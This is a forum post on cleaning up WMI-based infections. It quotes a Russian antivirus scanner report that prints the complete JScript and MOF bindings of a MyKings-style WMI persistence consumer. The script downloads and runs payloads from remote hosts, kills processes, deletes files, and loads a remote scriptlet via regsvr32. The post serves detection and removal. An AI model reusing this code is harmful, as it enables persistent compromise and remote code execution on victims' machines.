Jump to content

WMI Infections


Recommended Posts

At the forum forum.esetnod32.ru we solve the problem with WMI scripts using the program Universal Virus Sniffer

https://forum.esetnod32.ru/forum6/topic14074/
 

Quote

 

Полное имя WMI_ACTIVESCRIPTEVENTCONSUMER\YOUMM2_CONSUMER.[YOUMM2_FILTER]
Имя файла YOUMM2_CONSUMER.[YOUMM2_FILTER]
Тек. статус ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске

Удовлетворяет критериям
WMI_ACTIVESCRIPTEVENTCONSUMER(CONSUMER_NAME ~ YOUMM2_CONSUMER)(1) [delall (0)]

Сохраненная информация на момент создания образа
Статус в автозапуске

Namespace \\.\root\subscription
Consumer_Name youmm2_consumer
Consumer_Class ActiveScriptEventConsumer
Consumer_ScriptingEngine Jscript
Consumer_ScriptText var toff=3000;var url1 = "][ттп://wmi.mykings.top:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for (i = 0; i < arr.length; i++) { t = arr.split(" "); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run("taskkill /f /im " + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject("WbemScripting.SWbemLocator");var service=locator.ConnectServer(".","root/cimv2");var colItems=service.ExecQuery("select * from Win32_Process");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption=="rundll32.exe")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get("Win32_Process");var url="][ттп://wmi.mykings.top:8888/test.html",http=new ActiveXObject("Microsoft.XMLHTTP"),ado=new ActiveXObject("ADODB.Stream"),wsh=new ActiveXObject("WScript.Shell");for(http.open("GET",url,!1),http.send(),str=http.responseText,arr=str.split("\r\n"),i=0;arr.length>i;i++)t=arr.split(" ",3),http.open("GET",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create("regsvr32 /s shell32.dll");pp.create("regsvr32 /s WSHom.Ocx");pp.create("regsvr32 /s scrrun.dll");pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");pp.create("regsvr32 /s jscript.dll");pp.create("regsvr32 /u /s /i:][ттп://js.mykings.top:280/v.sct scrobj.dll");pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa");
Filter_Name youmm2_filter
Filter_Class __EventFilter
Filter_Query select * from __timerevent where timerid="youmm2_itimer"
#MOF_Bind#
instance of __FilterToConsumerBinding
{
Consumer = "\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name="youmm2_consumer"";
Filter = "\\\\.\\root\\subscription:__EventFilter.Name="youmm2_filter"";
};

#MOF_Event#
instance of __EventFilter
{
Name = "youmm2_filter";
Query = "select * from __timerevent where timerid="youmm2_itimer"";
QueryLanguage = "wql";
};


 

 

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...